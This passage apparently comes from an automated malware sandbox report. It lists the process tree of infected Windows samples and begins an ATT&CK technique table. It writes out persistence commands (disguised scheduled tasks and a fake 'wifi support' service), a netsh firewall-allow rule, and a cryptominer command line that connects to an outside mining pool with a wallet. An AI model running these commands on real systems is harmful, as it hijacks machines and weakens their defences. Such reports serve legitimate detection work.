                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --mojo-platform-channel-handle=1740 /prefetch:8
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                                  PID:604
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1672 /prefetch:2
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:8636
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --mojo-platform-channel-handle=2164 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:9108
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2584 /prefetch:1
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                      PID:4272
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                      PID:8700
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:2
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:7584
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --mojo-platform-channel-handle=3648 /prefetch:8
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                        PID:7164
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --mojo-platform-channel-handle=3520 /prefetch:8
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:7972
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --mojo-platform-channel-handle=3280 /prefetch:8
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:4164
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --mojo-platform-channel-handle=2576 /prefetch:8
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:6308
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,14128015490211600247,16504834859392667873,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8560_612533131" --mojo-platform-channel-handle=824 /prefetch:8
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:5476
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_B16.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5724
                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                          PID:4436
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:7004
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 624
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                              PID:5980
                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Boot\et-EE\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          PID:7816
                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                          schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\d3d10\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          PID:1840
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:8832
                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:8472
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1184
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:6744
                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:3008
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:7320
                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:7152
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:8464
                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:8384
                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                            schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaSpeechUXRes\SearchUI.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:5116
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C467.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C467.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:6208
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D0AC.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D0AC.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6176
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\wmxybdoo\
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:6056
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mzzxwxkk.exe" C:\Windows\SysWOW64\wmxybdoo\
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:7240
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" create wmxybdoo binPath= "C:\Windows\SysWOW64\wmxybdoo\mzzxwxkk.exe /d\"C:\Users\Admin\AppData\Local\Temp\D0AC.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2876
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" description wmxybdoo "wifi internet conection"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:8324
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" start wmxybdoo
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:7992
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:2884
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DE2A.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\DE2A.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:6184
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E407.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E407.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:3012
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F260.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F260.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            PID:2372
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F260.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\F260.exe"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:8372
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5736
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:7584
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7236
                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5136
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:6892
                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:7280
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                          PID:8988
                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                          PID:7192
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                          PID:3188
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks.exe /create /tn "cbXM59eGxT7jDtiNT7ESqv8S" /sc ONLOGON /tr "'C:\Users\Admin\Documents\UnblockSave\cbXM59eGxT7jDtiNT7ESqv8S.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                          PID:7852
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wmxybdoo\mzzxwxkk.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\wmxybdoo\mzzxwxkk.exe /d"C:\Users\Admin\AppData\Local\Temp\D0AC.exe"
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                          PID:8832
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                            svchost.exe
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                            PID:7740
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:7944
                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                            PID:6900
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{10412c76-b0a4-014b-bd59-807e984f8863}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                              PID:8132
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                              DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                              PID:4192
                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                            PID:8972
                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:1212
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Config.Msi\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                              PID:9200
                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                              PID:948
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                              PID:2736
                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                              PID:2416
                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                PID:1136
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                              schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\System32\nshhttp\SppExtComObj.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                              PID:9188
                                                                                                                                                                                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:8636
                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                PID:7060
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                werfault.exe /h /shared Global\5bb8b962170747028019be4bc1c287da /t 8280 /p 6188
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:9076
                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5212

                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                                  Modify Registry

